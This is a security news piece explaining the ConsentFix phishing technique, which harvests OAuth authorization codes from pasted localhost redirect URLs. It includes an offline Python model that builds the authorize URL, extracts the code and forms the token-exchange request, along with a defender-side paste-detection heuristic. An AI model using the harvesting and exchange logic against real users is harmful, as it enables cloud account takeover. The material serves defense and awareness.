Security researchers have identified a new phishing technique called ConsentFix that compromises cloud accounts by abusing a legitimate OAuth authorization-code flow rather than stealing passwords or MFA codes. The victim is socially engineered into signing in on the genuine Microsoft login page and then copying the post-login redirect URL, which carries an OAuth authorization code, back into an attacker-controlled page. The attacker exchanges that code for access tokens and gains access to the victim's cloud account without ever seeing a credential. The phishing page validates that the visitor's email address matches the intended target, and because every authentication step happens on trusted Microsoft infrastructure, the sign-in looks normal to organizations monitoring their cloud services.
The ConsentFix method resembles the previously documented ClickFix technique, which used fake CAPTCHA pages to get victims to run commands, but it harvests tokens directly through the OAuth process. The phishing flow presents a Cloudflare-style verification prompt, validates the target's email address, and redirects to a legitimate Microsoft login page whose redirect URI points at localhost. After successful authentication the browser lands on a localhost URL that contains the authorization code; nothing on the victim's machine is listening there, so the instruction to copy that URL and paste it into the phishing site appears plausible, and doing so hands the attacker the code needed to take over the session. This poses a significant risk to organizations using cloud platforms: the victim completes MFA on the real Microsoft page, so password- and MFA-focused defenses see a routine sign-in, and the attack exploits the trust placed in the OAuth flow itself.
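The flow described above, modeled offline as an added example. This is not Push Security's or Arctic Wolf's code and not the attacker's kit; the client ID, tenant ("common"), scope, state and the sample URLs are placeholders constructed for illustration. Nothing here makes a network request: the authorize URL and the token-exchange body are built from the RFC 6749 authorization-code grant, and the last function is a defender-side heuristic for spotting a pasted authorization-code redirect (for instance in a browser extension or DLP rule).

```python
"""Model of the ConsentFix authorization-code harvest (constructed example).

Assumptions: the Microsoft v2.0 authorize and token endpoints below are the
standard public ones; client_id, state and every URL in the usage block are
placeholders. No request is ever sent.
"""
from urllib.parse import urlencode, urlparse, parse_qs

AUTHORIZE_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
TOKEN_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/token"
LOOPBACK_HOSTS = ("localhost", "127.0.0.1")


def build_authorize_url(client_id, redirect_uri, scope, state, login_hint=None):
    """The legitimate sign-in URL the phishing page sends the victim to.

    The redirect_uri is a loopback address: after sign-in the browser is sent
    to localhost, where nothing is listening, which is what makes the
    "copy this URL back to us" instruction believable.
    """
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": redirect_uri,
        "scope": scope,
        "state": state,
    }
    if login_hint:
        params["login_hint"] = login_hint  # pre-fills the targeted address
    return f"{AUTHORIZE_ENDPOINT}?{urlencode(params)}"


def extract_auth_code(pasted_url, expected_state=None):
    """What the attacker's page does with the pasted localhost URL.

    Returns the authorization code, or None when the paste is not a usable
    redirect (wrong host, an error response, or a state mismatch).
    """
    u = urlparse(pasted_url.strip())
    if u.hostname not in LOOPBACK_HOSTS:
        return None
    q = parse_qs(u.query)
    if "error" in q:
        return None
    if expected_state is not None and q.get("state", [None])[0] != expected_state:
        return None
    return q.get("code", [None])[0]


def build_token_request(code, client_id, redirect_uri, scope):
    """Body of the RFC 6749 section 4.1.3 code exchange sent to TOKEN_ENDPOINT.

    redirect_uri must match the one used in the authorize request; a public
    client sends no client_secret, which is why a harvested code is enough.
    """
    return {
        "grant_type": "authorization_code",
        "code": code,
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "scope": scope,
    }


def is_oauth_redirect_paste(text):
    """Defender-side heuristic: does this clipboard/paste content look like an
    OAuth authorization-code redirect? Flags a URL with a `code` parameter
    that also carries `state`/`session_state` or points at loopback."""
    u = urlparse(text.strip())
    if u.scheme not in ("http", "https") or not u.netloc:
        return False
    q = parse_qs(u.query)
    if "code" not in q:
        return False
    return "state" in q or "session_state" in q or u.hostname in LOOPBACK_HOSTS


if __name__ == "__main__":
    # Placeholder values; the pasted URL is constructed, not captured.
    client_id = "00000000-0000-0000-0000-000000000000"
    redirect_uri = "http://localhost"
    scope = "openid offline_access"
    state = "abc123"
    print(build_authorize_url(client_id, redirect_uri, scope, state,
                              login_hint="victim@example.com"))
    pasted = "http://localhost/?code=0.AXYZ&state=abc123"
    code = extract_auth_code(pasted, expected_state=state)
    print("harvested code:", code)
    print("token request:", build_token_request(code, client_id, redirect_uri, scope))
    print("paste looks like an OAuth redirect:", is_oauth_redirect_paste(pasted))
```

The `state` check on the harvesting side is there because the attacker must pair the pasted code with the session that served the authorize URL; a defender reading this should note that `is_oauth_redirect_paste` fires on the same shape of URL, so blocking or alerting on such pastes into non-Microsoft origins directly addresses the guidance to never paste authentication URLs into untrusted sites.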

Arctic Wolf published analysis describing how ConsentFix harvests OAuth authorization codes and exchanges them for access tokens, enabling account takeover through trusted identity infrastructure. The guidance recommended never pasting authentication URLs into untrusted sites, improving endpoint and network visibility, and reinforcing security awareness training.
Push Security reported a newly observed browser-based phishing technique named ConsentFix, which abuses legitimate OAuth authentication and consent flows to compromise cloud accounts without stealing passwords or MFA codes. The technique tricks victims into copying and pasting a valid Microsoft sign-in URL containing an OAuth authorization code into an attacker-controlled page.